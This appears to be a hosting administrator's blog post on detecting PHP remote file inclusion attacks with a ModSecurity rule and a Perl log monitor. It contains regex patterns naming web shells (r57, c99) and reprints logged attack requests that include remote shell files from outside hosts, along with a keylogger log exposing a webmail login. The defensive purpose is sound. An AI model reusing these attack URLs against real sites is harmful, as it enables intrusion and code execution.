Remote File Inclusion Detector

PHP allow_url_include headaches


allow_url_include, oh boy. Disable it to somewhat improve your security posture, or leave it enabled and don't lose customers whose scripts need it. What if we left it enabled, but carefully monitored when it was being abused? That's precisely what we did, and detected plenty of attacks as a result.

Here's how it worked: first, log attempts to abuse remotely included files over HTTP or HTTPS (I didn't consider other PHP protocol wrappers at the time). I added this to modsec.user.conf, which logged abuse attempts to modsec's audit_log:

        SecFilterSelective REQUEST_URI "\.php\?(.*)=http" "log,pass"

Next, using perl's File::Tail module, poll the modsec audit_log every second for remote file inclusion attempts based on our rule. This was the logic from the script:

if ($request =~ /\/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\//)
{
    $event_description = "Remote destination is an IP address";
}

elsif ($request =~ /\.(gif|jpg|txt|dat)\?/i)
{
    $event_description = "The request contains something similiar to: .gif?command=";
}

elsif ($request =~ /(lol([^a-zA-Z])|cmd|r57|c99)/i)
{
    $event_description = "The request possibly contains phpshell or remote command activity";
}

elsif ($request =~ /base64_decode/)
{
    $event_description = "base64_decode found in request string";
}

elsif ($request =~ /eval\(/)
{
    $event_description = "The request contains \"eval(\"";
}

elsif ($useragent =~ /libwww-perl/i)
{
    $event_description = "The user agent is libwww-perl";
}

This required fairly regular whitelisting in the beginning, as many customers had scripts that legitimately used this feature.

Here are some of the emails I received from the script, alerting me of successful attacks. I've replaced all instances of customer domain names with "example.com". Check out the keystroke logging activity I unintentionally picked up in the bottom one.

DATE:            09/Oct/2006:11:37:12
METHOD:          GET
STATUS CODE:     200
SITE:            www.example.com
REQUEST:         /oneadmin/newspublish///include.php?path[docroot]=http://www.sv-sirzenich.de/images/c.jpg?
REFERER:         "-"
SOURCE:          202.155.147.188
USER AGENT:      "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7"


The request contains something similiar to: .gif?command=


DATE:            29/Jul/2007:17:51:20
METHOD:          GET
STATUS CODE:     200
SITE:            www.example.com
REQUEST:         /imarticleexchange/index.php?page=http://80.190.251.67/skins/skin_27/blank
REFERER:         "-"
SOURCE:          218.247.167.36
USER AGENT:      "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5"


Remote destination is an IP address


This one came from a frustrated attacker. The customer's website used a popular articles hosting application with a trivial remote file inclusion vulnerability. I'd already patched this customer when I started getting email alerts that someone was trying to hack their site. After a few minutes of trying unsuccessfully to exploit a bug that didn't exist, they gave up, but not before leaving a message in the logs:

DATE:            26/Oct/2007:16:20:03
METHOD:          GET
STATUS CODE:     200
SITE:            www.example.com
REQUEST:         //index.php?page=http://If.u.patch.shell.u.are.gay/shell.txt?::
REFERER:         "-"
SOURCE:          62.101.126.209
USER AGENT:      "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR


The request contains something similiar to: .gif?command=

Why yes, I *did* "patch shell", 62.101.126.209. And I'm not interested, but thanks anyway.


Here's some keystroke logging activity that records the active application (Internet Explorer), the title text, mouse clicks, and keystrokes. Detecting this was completely unintentional. [M] = mouseclick.

DATE:            13/Jun/2007:11:02:46
METHOD:          GET
STATUS CODE:     500
SITE:            example.com
REQUEST:         /logger.php?action=log&user=SYSTEM&data=<b>IEXPLORE.EXE</b> <font color=0000FF>[orkut - Efetuar login - Microsoft Internet Explorer - http://www.orkut.com/GLogin.aspx?done=http://www.orkut.com/Album.aspx?uid=10420673428816551739]</font>redacted@hotmail.com <b>[M]</b> m12345m <b>[M]</b> m12345m <b>[M]</b> [DEL][DEL][DEL][DEL][DEL][DEL][redacted@hotmail.com <b>[M]</b> m12345m <b>[M]</b> <br>- \x8a
REFERER:         "-"
SOURCE:          201.58.177.113
USER AGENT:      "-" - "-"


Unknown Event